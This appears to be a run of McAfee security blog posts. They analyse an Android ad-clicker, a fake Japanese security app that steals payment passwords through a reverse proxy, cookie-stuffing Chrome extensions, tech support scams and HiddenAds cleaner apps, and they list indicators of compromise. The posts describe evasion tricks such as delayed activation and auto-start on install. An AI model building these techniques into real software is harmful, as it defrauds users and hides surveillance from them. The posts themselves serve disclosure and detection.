When an FCM message receives and meets some condition, the latent function starts working. Mainly, it is visiting websites which are delivered by FCM message and browsing them successively in the background while mimicking user’s behavior. This may cause heavy network traffic and consume power without user awareness during the time it generates profit for the threat actor behind this malware. In the picture below there is an example of the network traffic generated to get the information required to generate fake clicks and the websites visited without user’s consent or interaction:
So far, we have identified two pieces of code related to this threat. One is “com.click.cas” library which focuses on the automated clicking functionality while “com.liveposting” library works as an agent and runs hidden adware services:
Depending on the version of the applications, some have both libraries working together while other applications only have “com.liveposting” library. The malware is using installation time, random delay and user presence to avoid the users from noticing these malicious acts. The malicious behavior won’t start if the installation time is within an hour and during the time the user is using the device, probably to stay under the radar and avoid being detected right away:
Clicker malware targets illicit advertising revenue and can disrupt the mobile advertising ecosystem. Malicious behavior is cleverly hidden from detection. Malicious actions such as retrieving crawl URL information via FCM messages start in the background after a certain period of time and are not visible to the user.
McAfee Mobile Security detects and removes malicious applications like this one that may run in the background without user’s knowledge. Also, we recommend having a security software installed and activated so you will be notified of any mobile threats present on your device in a timely manner. Once you remove this and other malicious applications, you can expect an extended battery time and you will notice reduced mobile data usage while ensuring that your sensitive and personal data is protected from this and other types of threats.
liveposting[.]net
sideup[.]co[.]kr
msideup[.]co[.]kr
post-blog[.]com
pangclick[.]com
modooalba[.]net
SHA256 | Package name | Name | Downloaded |
a84d51b9d7ae675c38e260b293498db071b1dfb08400b4f65ae51bcda94b253e | com.hantor.CozyCamera | High-Speed Camera | 10,000,000+ |
00c0164d787db2ad6ff4eeebbc0752fcd773e7bf016ea74886da3eeceaefcf76 | com.james.SmartTaskManager | Smart Task Manager | 5,000,000+ |
b675404c7e835febe7c6c703b238fb23d67e9bd0df1af0d6d2ff5ddf35923fb3 | kr.caramel.flash_plus | Flashlight+ | 1,000,000+ |
65794d45aa5c486029593a2d12580746582b47f0725f2f002f0f9c4fd1faf92c | com.smh.memocalendar | 달력메모장 | 1,000,000+ |
82723816760f762b18179f3c500c70f210bbad712b0a6dfbfba8d0d77753db8d | com.joysoft.wordBook | K-Dictionary | 1,000,000+ |
b252f742b8b7ba2fa7a7aa78206271747bcf046817a553e82bd999dc580beabb | com.kmshack.BusanBus | BusanBus | 1,000,000+ |
a2447364d1338b73a6272ba8028e2524a8f54897ad5495521e4fab9c0fd4df6d | com.candlencom.candleprotest | Flashlight+ | 500,000+ |
a3f484c7aad0c49e50f52d24d3456298e01cd51595c693e0545a7c6c42e460a6 | com.movinapp.quicknote | Quick Note | 500,000+ |
a8a744c6aa9443bd5e00f81a504efad3b76841bbb33c40933c2d72423d5da19c | com.smartwho.SmartCurrencyConverter | Currency Converter | 500,000+ |
809752e24aa08f74fce52368c05b082fe2198a291b4c765669b2266105a33c94 | com.joysoft.barcode | Joycode | 100,000+ |
262ad45c077902d603d88d3f6a44fced9905df501e529adc8f57a1358b454040 | com.joysoft.ezdica | EzDica | 100,000+ |
1caf0f6ca01dd36ba44c9e53879238cb46ebb525cb91f7e6c34275c4490b86d7 | com.schedulezero.instapp | Instagram Profile Downloader | 100,000+ |
78351c605cfd02e1e5066834755d5a57505ce69ca7d5a1995db5f7d5e47c9da1 | com.meek.tingboard | Ez Notes | 100,000+ |
4dd39479dd98124fd126d5abac9d0a751bd942b541b4df40cb70088c3f3d49f8 | com.candlencom.flashlite | 손전등 | 1,000+ |
309db11c2977988a1961f8a8dbfc892cf668d7a4c2b52d45d77862adbb1fd3eb | com.doubleline.calcul | 계산기 | 100+ |
bf1d8ce2deda2e598ee808ded71c3b804704ab6262ab8e2f2e20e6c89c1b3143 | com.dev.imagevault | Flashlight+ | 100+ |
The post New Malicious Clicker found in apps installed by 20M+ users appeared first on McAfee Blog.
Authored by SangRyol Ryu and Yukihiro Okutomi
McAfee’s Mobile Research team recently analyzed new malware targeting mobile payment users in Japan. The malware which was distributed on the Google Play store pretends to be a legitimate mobile security app, but it is in fact a payment fraud malware stealing passwords and abusing reverse proxy targeting the mobile payment services. McAfee researchers notified Google of the malicious apps, スマホ安心セキュリティ, or ‘Smartphone Anshin Security’, package name ‘com.z.cloud.px.app’ and ‘com.z.px.appx’. The applications are no longer available on Google Play. Google Play Protect has also taken steps to protect users by disabling the apps and providing a warning. McAfee Mobile Security products detect this threat as Android/ProxySpy.
The malware actor continues to publish malicious apps on the Google Play Store with various developer accounts. According to the information posted on Twitter by Yusuke Osumi, Security Researcher at Yahoo! Japan, the attacker sends SMS messages from overseas with a Google Play link to lure users to install the malware. To attract more users, the message entices users to update security software.
A SMS message from France (from Twitter post by Yusuke)
Malware on Google Play
The Mobile Research team also found that the malware actor uses Google Drive to distribute the malware. In contrast to installing an application after downloading an APK file, Google Drive allows users to install APK files without leaving any footprint and makes the installation process simpler. Once the user clicks the link, there are only a few more touches required to run the application. Only three clicks are enough if users have previously allowed the installation of unknown apps on Google Drive.
Following notification from McAfee researchers, Google has removed known Google Drive files associated with the malware hashes listed in this blog post.
When a user installs and launches this malware, it asks for the Service password. Cleverly, the malware shows incorrect password messages to collect the more precise passwords. Of course, it does not matter whether the password is correct or not. It is a way of getting the Service password. The Service password is used for the payment service which provides easy online payments. The user can start this payment service by setting a Service password. The charge will be paid along with the mobile phone bill. After the password activity, the malware shows fake mobile security screen. Interestingly, the layout of the activity is similar to our old McAfee Mobile Security. All buttons look genuine, but these are all fake.
The Network password is used for the NTT DOCOMO payment service which provides easy online payments. NTT DOCOMO mobile network users can start this payment service by just setting 4-digits password called a Network password. The charge will be paid along with the mobile phone bill. When you need to pay online, you can simply do the payment process by entering the 4-digits password.
After the password activity, the malware shows a fake mobile security screen. Interestingly, the layout of the activity is similar to our old McAfee Mobile Security. All buttons look genuine, but these are all fake.
There is a native library named ‘libmyapp.so’ loaded during the app execution written in Golang. The library, when loaded, tries to connect to the C2 server using a Web Socket. Web Application Messaging Protocol (WAMP) is used to communicate and process Remote Procedure Calls (RPC). When the connection is made, the malware sends out network information along with the phone number. Then, it registers the client’s procedure commands described in the table below. The web socket connection is kept alive and takes the corresponding action when the command is received from the server like an Agent. And the socket is used to send the Service password out to the attacker when the user enters the Service password on the activity.
RPC Function name | Description |
connect_to | Create reverse proxy and connect to remote server |
disconnect | Disconnect the reverse proxy |
get_status | Send the reverse proxy status |
get_info | Send line number, connection type, operator, and so on |
toggle_wifi | Set the Wi-Fi ON/OFF |
show_battery_opt | Show dialog to exclude battery optimization for background work |
Registered RPC functions description
To make a fraudulent purchase by using leaked information, the attacker needs to use the user’s network. The RPC command ‘toggle_wifi’ can switch the connection state to Wi-Fi or cellular network, and ‘connect_to’ will provide a reverse proxy to the attacker. A reverse proxy can allow connecting the host behind a NAT (Network Address Translation) or a firewall. Via the proxy, the attacker can send purchase requests via the user’s network.
It is an interesting point that the malware uses a reverse proxy to steal the user’s network and implement an Agent service with WAMP. McAfee Mobile Research Team will continue to find this kind of threat and protect our customers from mobile threats. It is recommended to be more careful when entering a password or confidential information into untrusted applications.
193[.]239[.]154[.]23
91[.]204[.]227[.]132
ruboq[.]com
SHA256 | Package Name | Distribution |
5d29dd12faaafd40300752c584ee3c072d6fc9a7a98a357a145701aaa85950dd | com.z.cloud.px.app | Google Play |
e133be729128ed6764471ee7d7c36f2ccb70edf789286cc3a834e689432fc9b0 | com.z.cloud.px.app | Other |
e7948392903e4c8762771f12e2d6693bf3e2e091a0fc88e91b177a58614fef02 | com.z.px.appx | Google Play |
3971309ce4a3cfb3cdbf8abde19d46586f6e4d5fc9f54c562428b0e0428325ad | com.z.cloud.px.app2 | Other |
2ec2fb9e20b99f60a30aaa630b393d8277949c34043ebe994dd0ffc7176904a4 | com.jg.rc.papp | Google Drive |
af0d2e5e2994a3edd87f6d0b9b9a85fb1c41d33edfd552fcc64b43c713cdd956 | com.de.rc.seee | Google Drive |
The post Fake Security App Found Abuses Japanese Payment System appeared first on McAfee Blog.
Authored by Oliver Devane and Vallabh Chole
September 9, 2022 Update: Since the original publication of this blog on August 29, 2022, the Flipshope browser extension was updated in the Chrome Store on September 6, 2022 with a version that no longer contains the potentially harmful features originally discussed in this blog.
September 30, 2022 Update: Since the original publication of this blog on August 29, 2022, the AutoBuy browser extension was updated in the Chrome Store on September 17, 2022 with a version that no longer contains the potentially harmful features originally discussed in this blog.
A few months ago, we blogged about malicious extensions redirecting users to phishing sites and inserting affiliate IDs into cookies of eCommerce sites. Since that time, we have investigated several other malicious extensions and discovered 5 extensions with a total install base of over 1,400,000
The extensions offer various functions such as enabling users to watch Netflix shows together, website coupons, and taking screenshots of a website. The latter borrows several phrases from another popular extension called GoFullPage
Apart from offering the intended functionality, the extensions also track the user’s browsing activity. Every website visited is sent to servers owned by the extension creator. They do this so that they can insert code into eCommerce websites being visited. This action modifies the cookies on the site so that the extension authors receive affiliate payment for any items purchased.
The users of the extensions are unaware of this functionality and the privacy risk of every site being visited being sent to the servers of the extension authors.
The 5 extensions are
Name | Extension ID | Users |
Netflix Party | mmnbenehknklpbendgmgngeaignppnbe | 800,000 |
Netflix Party 2 |
flijfnhifgdcbhglkneplegafminjnhn | 300,000 |
FlipShope – Price Tracker Extension
|
adikhbfjdbjkhelbdnffogkobkekkkej | 80,000 |
Full Page Screenshot Capture – Screenshotting
|
pojgkmkfincpdkdgjepkmdekcahmckjp | 200,000 |
AutoBuy Flash Sales | gbnahglfafmhaehbdmjedfhdmimjcbed | 20,000 |
This section contains the technical analysis of the malicious chrome extension ‘mmnbenehknklpbendgmgngeaignppnbe’. All 5 extensions perform similar behavior.
The manifest.json sets the background page as bg.html. This HTML file loads b0.js and this is responsible for sending the URL being visited and injecting code into the eCommerce sites.
The b0.js script contains many functions. This blog will focus on the functions which are responsible for sending the visited URLs to the server and processing the response.
Chrome extensions work by subscribing to events which they then use as triggers to perform a certain activity. The extensions analyzed subscribe to events coming from chrome.tabs.onUpdated. chrome.tabs.onUpdated will trigger when a user navigates to a new URL within a tab.
Once this event triggers, the extension will set a variable called curl with the URL of the tab by using the tab.url variable. It creates several other variables which are then sent to d.langhort.com. The POST data is in the following format:
Variable | Description |
Ref | Base64 encoded referral URL |
County | The county of the device |
City | The city of the device |
Zip | The zip code of the device |
Apisend | A random ID generated for the user. |
Name | Base64 encoded URL being visited |
ext_name | The name of the chrome extensions |
The random ID is created by selecting 8 random characters in a character set. The code is shown below:
The country, city, and zip are gathered using ip-api.com. The code is shown below:
Upon receiving the URL, langhort.com will check if it matches a list of websites that it has an affiliate ID for, and If it does, it will respond to the query. An example of this is shown below:
The data returned is in JSON format. The response is checked using the function below and will invoke further functions depending on what the response contains.
Two of the functions are detailed below:
If the result is ‘c’ such as the one in this blog, the extension will query the returned URL. It will then check the response and if the status is 200 or 404, it will check if the query responded with a URL. If it did, it would insert the URL that is received from the server as an Iframe on the website being visited.
If the result is ‘e’, the extension would insert the result as a cookie. We were unable to find a response of ‘e’ during our analysis, but this would enable the authors to add any cookie to any website as the extensions had the correct ‘cookie’ permissions.
The images below show the step-by-step flow of events while navigating to the BestBuy website.
Here is a video of the events
We discovered an interesting trick in a few of the extensions that would prevent malicious activity from being identified in automated analysis environments. They contained a time check before they would perform any malicious activity. This was done by checking if the current date is > 15 days from the time of installation.
This blog highlights the risk of installing extensions, even those that have a large install base as they can still contain malicious code.
McAfee advises its customers to be cautious when installing Chrome extensions and pay attention to the permissions that they are requesting.
The permissions will be shown by Chrome before the installation of the extension. Customers should take extra steps to verify the authenticity if the extension is requesting permissions that enable it to run on every website you visit such as the one detailed in this blog
McAfee customers are protected against the malicious sites detailed in this blog as they are blocked with McAfee WebAdvisor as shown below.
The Malicious code within the extension is detected as JTI/Suspect. Please perform a ‘Full’ scan via the product.
Type | Value | Product | Detected |
Chrome Extension | Netflix Party – mmnbenehknklpbendgmgngeaignppnbe | Total Protection and LiveSafe | JTI/Suspect |
Chrome Extension | FlipShope – Price Tracker Extension – Version 3.0.7.0 – adikhbfjdbjkhelbdnffogkobkekkkej | Total Protection and LiveSafe | JTI/Suspect |
Chrome Extension |
Full Page Screenshot Capture
pojgkmkfincpdkdgjepkmdekcahmckjp |
Total Protection and LiveSafe | JTI/Suspect |
Chrome Extension | Netflix Party 2 – flijfnhifgdcbhglkneplegafminjnhn | Total Protection and LiveSafe | JTI/Suspect |
Chrome Extension | AutoBuy Flash Sales gbnahglfafmhaehbdmjedfhdmimjcbed | Total Protection and LiveSafe | JTI/Suspect |
URL | www.netflixparty1.com | McAfee WebAdvisor | Blocked |
URL | netflixpartyplus.com | McAfee WebAdvisor | Blocked |
URL | goscreenshotting.com | McAfee WebAdvisor | Blocked |
URL | langhort.com | McAfee WebAdvisor | Blocked |
URL | Unscart.in | McAfee WebAdvisor | Blocked |
URL | autobuyapp.com | McAfee WebAdvisor | Blocked |
The post Malicious Cookie Stuffing Chrome Extensions with 1.4 Million Users appeared first on McAfee Blog.
Authored by Oliver Devane
Technical Support Scams have been targeting computer users for many years. Their goal is to make victims believe they have issues needing to be fixed, and then charge exorbitant fees, which unfortunately some victims pay. This blog post covers a number of example actions, that scammers will go through when they are performing their scams. Our goal is to educate consumers on the signs to look out for, and what to do if they believe they are being scammed.
For a tech support scammer to reach their victims, they need to first find them (or be found by them). One technique we see includes scammers creating Twitter or other social media accounts that post messages claiming to be from the official technical support site. For example, a Twitter account will post a tweet with the hashtags #McAfee and #McAfeeLogin to drive traffic to the tweet and make victims believe the links are legitimate and safe to click.
Scammers behind tech support scams can create very convincing websites which mimic the official ones.
Some fraudulent websites use the McAfee logo or other company logos to try trick individuals. They often invite clicking on a ‘LOGIN’ or ‘ACTIVATE’ link with a similar color scheme to official sites to appear legitimate.
These sites may then ask the victim to enter their real username, password, and phone number. Upon entering these details, websites will usually show an error message to make the victim believe there is an issue with their account.
The error message will usually contain a link that upon clicking will load a chat box where the scammers will initiate a conversation with the victim. At this point, the scammers will have the phone number and email address associated with the victim. They will use this to contact them and make them believe they are an official technical support employee.
The scammer’s next objective is often to gain access to the victim’s computer. They do this so that they can trick the victim into believing there is an issue with their computer and that they need their support services to fix it.
The scammers will do this by either asking the victim to enter a URL that will result in the download of a remote access tool or by providing them with a link in the chat window if they are still speaking to them on the fake support website.
A remote access tool will enable the scammer to take complete control of the victim’s machine. With this, they will be able to remove or install software, access personal data such as documents and cryptocurrency wallets as well as dump passwords from the web browsers so they can then access all the victim’s accounts.
It is vital to not provide remote access to your computer to unknown and unverified individuals, as there could be a big risk to your personal data. Some examples of remote access tools that have legitimate uses but are often used to perpetrate fraud are:
If the scammers are given access to the victim’s machine, they will often make use of the command filename cmd.exe to perform some visual activity on the computer screen which is done to attempt to trick the individual into believing that some malicious activity is occurring on their computer or network. Most people will be unaware of the filename cmd.exe and the actions being used,and thus will be none the wiser to the scammer’s actions.
Here are some examples we have seen scammers use:
Changing the title of cmd.exe to ‘network scanner’ or ‘file scanner’ to make the victim believe they are running a security tool on their machine.
Scammers will make use of standard functions within the cmd.exe file, to make their victims believe they are performing lots of activity. One of these functions is ‘dir’ which will display all the files for a specific directory. For example, if you have a folder called ‘school work’ and have 2 word documents in there, a ‘dir’ query of that folder will appear like this:
What the scammers will do is make use of ‘dir’ and the title function to make you believe they are scanning your machine. Here is an example of running ‘dir’ on the all the files on a machine with the cmd.exe title set to ‘File Scanner’:
A similar function to ‘dir’ called ‘tree’ may also be used. The ‘tree’ function will display directory paths and will generate lots of events on the screen:
Some scammers will also add their phone number to the taskbar of the victim’s machine. They do this by creating a new folder with the phone number as the name and adding it as a toolbar. This is shown in the image below
Scammers may install other software on the victim’s machine or make them believe that they have installed additional software which they will then be charged for.
For example, some scammers may add programs to the desktop of victims which have no purpose, but the scammers insist they are legitimate security tools such as firewalls or network scanners.
Some example filenames are:
The scammers will usually perform some activity on your machine before asking for payment. This is done to build confidence in their work and make you believe they have done some activity and therefore deserve some sort of payment. Do not be fooled by scammers who have not performed any useful activity. As detailed in the previous sections, be careful not to fall victim to fake social media accounts or websites.
This section contains a few signs to look out for which may indicate that you are interacting with a scammer.
Some scammers will become rude and very short with you if you start questioning what they are doing. They may say that you are not technical and do not understand what is occurring. This would not be the behavior of a legitimate technical support operative.
Scammers will encourage you to leave the machine and remote connection on even if you need to go out and leave it unattended. Do not under any circumstances do this as they would then be free to do any activity they wish on your machine and network.
Some files added to your machine by the scammer may be detected by the AV security software. They may act like this is an error and the file is innocent. If you have initiated a remote connection and the controller creates a file on your machine which is detected by the security software, we recommend ceasing the interaction as detailed below.
The following steps should be performed if you believe you are being scammed as part of a tech support scam.
If the machine is connected via a network cable, the easiest way is to unplug it. If the machine is connected via Wi-Fi, there may be a physical switch that can be used to disconnect it. If there is no physical switch, turn off Wi-Fi through the settings or the computer. It can be powered down by pressing the power button.
Hang up the phone (or end the chat) and do not answer any more calls from that number. The scammer will try to make you believe that the call is legitimate and ask you to reconnect the remote-control software.
If the scammer was controlling your machine, the remote-control software will need to be removed. If the computer was powered down, it can be powered back up, but if a popup is shown asking for permission to allow remote access, do not grant it.
The remote software can usually be removed by using the control panel and add/remove programs. To do this, press the Windows key and then perform a search for ‘remove’ and click on ‘Add or remove programs’.
Sort the programs by install date as shown below and then remove the remote software by clicking on the ‘Uninstall’ button. Keep in mind that the software installed on your computer may appear by a different name, but if you look at what was installed on the same day as the scammer initiated the remote control session, you should be able to identify it.
Some scammers may add exclusions for the files they create on your computer so that they are not detected by the security software. We recommend checking the exclusions and if any are present which were not added by yourself to remove them.
A guide for McAfee customers is available here
After removing any software which was installed, we recommend updating your security software and performing a full scan. This will identify any malicious files created by the scammer such as password stealers and keyloggers.
After performing a full scan, we recommend changing all of your passwords as the scammer may have gathered your credentials while they had access to your computer. It is recommended to do this after performing a full scan as the scammers may have placed a password stealer on the computer and any new passwords you enter may also be stolen.
This blog post contains a number of examples that scammers may use to trick consumers into believing that they may have issues with their devices. If you are experiencing issues with your computer and want to speak to official McAfee support, please reach out via the official channel which is https://service.mcafee.com/.
The McAfee support pages can also be accessed directly via the McAfee Total Protection screen as shown below:
McAfee customers utilizing web protection (including McAfee Web Advisor) are protected from known malicious sites.
The post Technical Support Scams – What to look out for appeared first on McAfee Blog.
Authored by Dexter Shin
McAfee’s Mobile Research Team has identified new malware on the Google Play Store. Most of them are disguising themselves as cleaner apps that delete junk files or help optimize their batteries for device management. However, this malware hides and continuously show advertisements to victims. In addition, they run malicious services automatically upon installation without executing the app.
They exist on Google Play even though they have malicious activities, so the victim can search for the following apps to optimize their device.
Users may generally think installing the app without executing it is safe. But you may have to change your mind because of this malware. When you install this malware on your device, it is executed without interaction and executes a malicious service.
In addition, they try to hide themselves to prevent users from noticing and deleting apps. Change their icon to a Google Play icon that users are familiar with and change its name to ‘Google Play’ or ‘Setting.’
Automatically executed services constantly display advertisements to victims in a variety of ways.
These services also induce users to run an app when they install, uninstall, or update apps on their devices.
To promote these apps to new users, the malware authors created advertising pages on Facebook. Because it is the link to Google Play distributed through legitimate social media, users will download it without a doubt.
This malware uses the Contact Provider. The Contact Provider is the source of data you see in the device’s contacts application, and you can also access its data in your own application and transfer data between the device and online services. For this, Google provides ContactsContract class. ContactsContract is the contract between the Contacts Provider and applications. In ContactsContract, there is a class called Directory. A Directory represents a contacts corpus and is implemented as a Content Provider with its unique authority. So, developers can use it if they want to implement a custom directory. The Contact Provider can recognize that the app is using a custom directory by checking special metadata in the manifest file.
The important thing is the Contact Provider automatically interrogates newly installed or replaced packages. Thus, installing a package containing special metadata will always call the Contact Provider automatically.
The first activity defined in the application tag in the manifest file is executed as soon as you install it just by declaring the metadata. The first activity of this malware will create a permanent malicious service for displaying advertisements.
In addition, the service process will generate immediately even if it is forced to kill.
Next, they change their icons and names using the <activity-alias> tag to hide.
It is confirmed that users have already installed these apps from 100K to 1M+. Considering that the malware works when it is installed, the installed number is reflected as the victim’s number. According to McAfee telemetry data, this malware and its variants affect a wide range of countries, including South Korea, Japan, and Brazil:
This malware is auto-starting malware, so as soon as the users download it from Google Play, they are infected immediately. And it is still constantly developing variants that are published by different developer accounts. Therefore, it is not easy for users to notice this type of malware.
We already disclosed this threat to Google and all reported applications were removed from the Play Store. Also, McAfee Mobile Security detects this threat as Android/HiddenAds and protects you from this type of malware. For more information about McAfee Mobile Security, visit https://www.mcafeemobilesecurity.com
App Name | Package Name | Downloads |
Junk Cleaner | cn.junk.clean.plp | 1M+ |
EasyCleaner | com.easy.clean.ipz | 100K+ |
Power Doctor | com.power.doctor.mnb | 500K+ |
Super Clean | com.super.clean.zaz | 500K+ |
Full Clean -Clean Cache | org.stemp.fll.clean | 1M+ |
Fingertip Cleaner | com.fingertip.clean.cvb | 500K+ |
Quick Cleaner | org.qck.cle.oyo | 1M+ |
Keep Clean | org.clean.sys.lunch | 1M+ |
Windy Clean | in.phone.clean.www | 500K+ |
Carpet Clean | og.crp.cln.zda | 100K+ |
Cool Clean | syn.clean.cool.zbc | 500K+ |
Strong Clean | in.memory.sys.clean | 500K+ |
Meteor Clean | org.ssl.wind.clean | 100K+ |
SHA256:
Domains:
The post New HiddenAds malware affects 1M+ users and hides on the Google Play Store appeared first on McAfee Blog.